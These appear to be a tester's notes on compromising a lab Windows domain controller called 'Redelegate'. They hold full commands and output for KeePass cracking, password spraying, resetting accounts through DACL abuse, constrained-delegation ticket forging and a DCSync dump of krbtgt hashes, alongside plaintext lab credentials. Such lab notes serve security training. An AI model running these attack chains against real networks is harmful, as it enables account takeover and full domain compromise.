Redelegate

This is not a writeup, just my notes about the machine.

Operating System: Windows Server 2022 Standard

Chain: False

Credentials

Username	Password	Method	Scope
Keepass	Fall2024!	Brute forcing
Payroll	cVkqz4bCM7kJRSNlgx2G	Extracted from Keepass DB
Timesheet	hMFS4I0Kj8Rcd62vqi5X	Extracted from Keepass DB
KeyFob	22331144	Extracted from Keepass DB
Administrator	Spdv41gg4BlBgSYIW1gF	Extracted from Keepass DB
FTPUser	SguPZBKdRyxWzvXRWy6U	Extracted from Keepass DB	FTP
SQLGuest	zDPBpaF4FywlqIv11vii	Extracted from Keepass DB	MSSQL
WordPress Panel	cn4KOEgsHqvKXPjEnSD9	Extracted from Keepass DB	Wordpress
marie.curie	Fall2024!	Brute forcing	Domain User

✅ Valid Usernames

ryan.cooper
marie.curie
FTPUser
WEB01
SQLGuest
Administrator

🔑 Passwords list

Fall2024!
cVkqz4bCM7kJRSNlgx2G
hMFS4I0Kj8Rcd62vqi5X
22331144
Spdv41gg4BlBgSYIW1gF
SguPZBKdRyxWzvXRWy6U
zDPBpaF4FywlqIv11vii
cn4KOEgsHqvKXPjEnSD9

Information Gathering

Nmap Scan

# Nmap 7.94SVN scan initiated Mon Apr 14 17:32:47 2025 as: nmap -sS -T5 -p- --open -A -Pn -n -oN ext_tcp_redelegate_allports -vvv 10.10.67.58
21/tcp    open  ftp           syn-ack ttl 127 Microsoft ftpd
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-14 21:35:17Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
1433/tcp  open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5357/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49675/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49932/tcp open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
61346/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
61358/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
61360/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Service Enumeration

FTP

Anonymous FTP login allowed

❯ wget -m --no-passive ftp://anonymous:anonymous@10.10.67.58
<SNIF> 
2025-04-14 17:44:49 (57.4 MB/s) - ‘10.10.67.58/CyberAudit.txt’ saved [434  
2025-04-14 17:44:50 (396 MB/s) - ‘10.10.67.58/Shared.kdbx’ saved [2622]  
2025-04-14 17:44:50 (54.1 KB/s) - ‘10.10.67.58/TrainingAgenda.txt’ saved [580]

File: CyberAudit.txt
----------------------------------
OCTOBER 2024 AUDIT FINDINGS

[!] CyberSecurity Audit findings:

1) Weak User Passwords
2) Excessive Privilege assigned to users
3) Unused Active Directory objects
4) Dangerous Active Directory ACLs

[*] Remediation steps:

1) Prompt users to change their passwords: DONE
2) Check privileges for all users and remove high privileges: DONE
3) Remove unused objects in the domain: IN PROGRESS
4) Recheck ACLs: IN PROGRESS

File: TrainingAgenda.txt
-----------------------------
EMPLOYEE CYBER AWARENESS TRAINING AGENDA (OCTOBER 2024)

Friday 4th October  | 14.30 - 16.30 - 53 attendees
"Don't take the bait" - How to better understand phishing emails and what to do when you see one


Friday 11th October | 15.30 - 17.30 - 61 attendees
"Social Media and their dangers" - What happens to what you post online?


Friday 18th October | 11.30 - 13.30 - 7 attendees
"Weak Passwords" - Why "SeasonYear!" is not a good password 


Friday 25th October | 9.30 - 12.30 - 29 attendees
"What now?" - Consequences of a cyber attack and how to mitigate them

Keepass Database (Not Success with rockyou)

❯ keepass2john Shared.kdbx > keepass.hash
❯ hashcat -m 29700 keepass.hash /usr/share/wordlists/rockyou.txt 

DNS

• Not vulnerable to DNS Zone Transfer

HTTP

• IIS Default Website

Kerberos

Nomenclature name: name.lastname@redelegate.vl

❯ /opt/kerbrute/kerbrute userenum --dc 10.10.67.58 -d redelegate.vl /opt/statistically-likely-usernames/john.smith.txt -t 100

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 04/14/25 - Ronnie Flathers @ropnop

2025/04/14 17:56:51 >  Using KDC(s):
2025/04/14 17:56:51 >  	10.10.67.58:88

2025/04/14 17:56:57 >  [+] VALID USERNAME:	ryan.cooper@redelegate.vl
2025/04/14 18:00:18 >  [+] VALID USERNAME:	marie.curie@redelegate.vl
2025/04/14 18:03:38 >  Done! Tested 248231 usernames (2 valid) in 407.089 seconds

Two Valid User obtained: ryan.cooper & marie.curie

SMB (enum4linux-ng)

Domain SID: S-1-5-21-4024337825-2033394866-2055507597

• Server allows null session

Initial Foothold

Bruteforcing Keepass database

According with TrainingAgenda.txt file found on FTP there was a hint looks like password SeasonYear!.

The tester created a file as follows:

File: possible-passwords.txt
---------------------------------
spring
summer
fall
winter
autumn

The tester created a hashcat rules file as follows:

File: custom.rule
---------------------------------
:
l
u

$2$0$2$3 
$2$0$2$4 
$2$0$2$5 
c $2$0$2$3 
c $2$0$2$4 
c $2$0$2$5 

$2$0$2$3 $!
$2$0$2$4 $!
$2$0$2$5 $!
c $2$0$2$3 $!
c $2$0$2$4 $!
c $2$0$2$5 $!

Finally performed the mutation procedure to create the final wordlist.

❯ hashcat --force possible-passwords.txt  -r custom.rule  --stdout | sort -u  > mut_passwords.txt

❯ john keepass.hash -w=mut_passwords.txt
<SNIF>
Fall2024!        (?)     
<SNIF>

Enumerating database

❯ kpcli --kdb=Shared.kdbx
Provide the master password: *************************
KeePass CLI (kpcli) v3.8.1 is ready for operation.
<SNIF>

The tester was able to retrieve a list of valis credentials stored into the keepass database. (Check Passwords list)

Brute forcing domain users.

❯ nxc smb 10.10.67.58 -u users.txt -p passwords.txt  --continue-on-success | grep "[+]" 
SMB                      10.10.67.58     445    DC               [+] redelegate.vl\marie.curie:Fall2024! 
❯ nxc mssql 10.10.67.58 -u users.txt -p passwords.txt --continue-on-success | grep "[+]"
MSSQL                    10.10.67.58     1433   DC               [+] redelegate.vl\marie.curie:Fall2024!

Finding kerberoastable and asreproastable users

❯ nxc ldap 10.10.67.58 -u 'marie.curie' -p 'Fall2024!' --asreproast asreproast.hashes
SMB         10.10.67.58     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
LDAP        10.10.67.58     389    DC               [+] redelegate.vl\marie.curie:Fall2024! 
LDAP        10.10.67.58     389    DC               [*] Total of records returned 3
LDAP        10.10.67.58     389    DC               No entries found!
❯ nxc ldap 10.10.67.58 -u 'marie.curie' -p 'Fall2024!' --kerberoast kerberoast.hashes
SMB         10.10.67.58     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
LDAP        10.10.67.58     389    DC               [+] redelegate.vl\marie.curie:Fall2024! 
LDAP        10.10.67.58     389    DC               Bypassing disabled account krbtgt 
LDAP        10.10.67.58     389    DC               No entries found!
LDAP        10.10.67.58     389    DC               [-] Error with the LDAP account used

Abusing DACL misconfiguration

Taking Over domain users

❯ bloodyAD -u 'marie.curie' -p 'Fall2024!' -d redelegate.vl --dc-ip 10.10.98.61 set password 'James.Dinkleberg' 'Passsword123!'
[+] Password changed successfully!
❯ bloodyAD -u 'marie.curie' -p 'Fall2024!' -d redelegate.vl --dc-ip 10.10.98.61 set password 'Guest' 'Passsword123!'
[+] Password changed successfully!

Constrained Delegation

Constrained Delegation from Linux

Changing the user account password

Helen.frost is member of Remote Management Users that allowed to authenticate remotely.

❯ bloodyAD -u 'marie.curie' -p 'Fall2024!' -d redelegate.vl --dc-ip 10.10.98.61 set password 'Helen.Frost' 'Passsword123!'
[+] Password changed successfully!

Changing the computer account password

#Using BloodyAD
❯ bloodyAD -u 'Helen.Frost' -p 'Passsword123!' -d redelegate.vl --dc-ip 10.10.98.61 set password 'FS01$' 'Passsword123!'
[+] Password changed successfully!

#Using net RCP
❯ net rpc password "FS01$" -U "redelegate.vl"/"Helen.Frost" -S 10.10.98.61

Adding TRUSTED_TO_AUTH_FOR_DELEGATION property

❯ bloodyAD -u 'Helen.Frost' -p 'Passsword123!' -d redelegate.vl --dc-ip 10.10.98.61 add uac 'FS01$' -f TRUSTED_TO_AUTH_FOR_DELEGATION
[-] ['TRUSTED_TO_AUTH_FOR_DELEGATION'] property flags added to FS01$'s userAccountControl

❯ bloodyAD -u 'Helen.Frost' -p 'Passsword123!' -d redelegate.vl --dc-ip 10.10.98.61 get object 'FS01$' --attr 'useraccountcontrol'

Setting msDS-AllowedToDelegateTo to LDAP

❯ bloodyAD -u 'Helen.Frost' -p 'Passsword123!' -d redelegate.vl --dc-ip 10.10.98.61 set object 'FS01$' 'msDS-AllowedToDelegateTo' -v 'ldap/dc.redelegate.vl'
[+] FS01$'s msDS-AllowedToDelegateTo has been updated

❯ bloodyAD -u 'Helen.Frost' -p 'Passsword123!' -d redelegate.vl --dc-ip 10.10.98.61 get object 'FS01$' --attr msDS-AllowedToDelegateTo

Requesting TGT using S4u

❯ impacket-getST 'redelegate.vl'/'FS01$':'Passsword123!' -impersonate dc -spn 'ldap/dc.redelegate.vl' 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating dc
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc@ldap_dc.redelegate.vl@REDELEGATE.VL.ccache

Performing DCSync Attack

❯ KRB5CCNAME='dc@ldap_dc.redelegate.vl@REDELEGATE.VL.ccache' impacket-secretsdump -k -no-pass dc.redelegate.vl -just-dc-user krbtgt
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9288173d697316c718bb0f386046b102:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:bff2ae7dfc202b4e7141a440c00b91308c45ea918b123d7e97cba1d712e6a435
krbtgt:aes128-cts-hmac-sha1-96:9690508b681c1ec11e6d772c7806bc71
krbtgt:des-cbc-md5:b3ce46a1fe86cb6b
[*] Cleaning up... 

Constrained Delegation from Windows

Changing computer Account password

*Evil-WinRM* PS C:\Temp> Set-ADAccountPassword -Identity "FS01$" -Reset -NewPassword (ConvertTo-SecureString "NewPassword123!" -AsPlainText -Force) -Verbose

Adding TRUSTED_TO_AUTH_FOR_DELEGATION property

*Evil-WinRM* PS C:\Temp> Set-ADAccountControl -Identity "FS01$" -TrustedToAuthForDelegation $True
*Evil-WinRM* PS C:\Temp> Get-ADComputer FS01 -Properties TrustedToAuthForDelegation

Setting msDS-AllowedToDelegateTo to LDAP

*Evil-WinRM* PS C:\Temp> Set-ADObject -Identity "CN=FS01,CN=COMPUTERS,DC=REDELEGATE,DC=VL" -Replace @{"msDS-AllowedToDelegateTo"="ldap/dc.redelegate.vl"}
*Evil-WinRM* PS C:\Temp> Get-ADComputer FS01 -Properties msDS-AllowedToDelegateTo

Requesting ticket granting ticket using S4U2Self and S4U2Proxy

*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> .\Rubeus.exe asktgt /user:FS01$ /password:'NewPassword123!' /nowrap
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> ./Rubeus.exe s4u /impersonateuser:dc /msdsspn:ldap/dc.redelegate.vl /ticket:<TICKET> /ptt
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> klist

Current LogonId is 0:0x79303

Cached Tickets: (1)

#0>	Client: dc @ REDELEGATE.VL
	Server: ldap/dc.redelegate.vl @ REDELEGATE.VL
	KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
	Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
	Start Time: 4/14/2025 21:42:10 (local)
	End Time:   4/15/2025 7:41:56 (local)
	Renew Time: 4/21/2025 21:41:56 (local)
	Session Key Type: AES-128-CTS-HMAC-SHA1-96
	Cache Flags: 0
	Kdc Called:
	

Performing DCSync Attack using mimikatz (Not Working)

If someone knows why this is happend, please contact to me. I really appreciate a lot understand why this is not working as expected.

*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> .\mimikatz.exe privilege::debug "lsadump::dcsync /all /patch" exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz(commandline) # lsadump::dcsync /all /patch
[DC] 'redelegate.vl' will be the domain
[DC] 'dc.redelegate.vl' will be the DC server
[DC] Exporting domain 'redelegate.vl'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x00002105 (8453)

mimikatz(commandline) # exit
Bye!

Performing DCSync attack using impacket toolkit

❯ impacket-getST 'redelegate.vl'/'FS01$':'NewPassword123!' -impersonate dc -spn 'ldap/dc.redelegate.vl' 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating dc
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc@ldap_dc.redelegate.vl@REDELEGATE.VL.ccache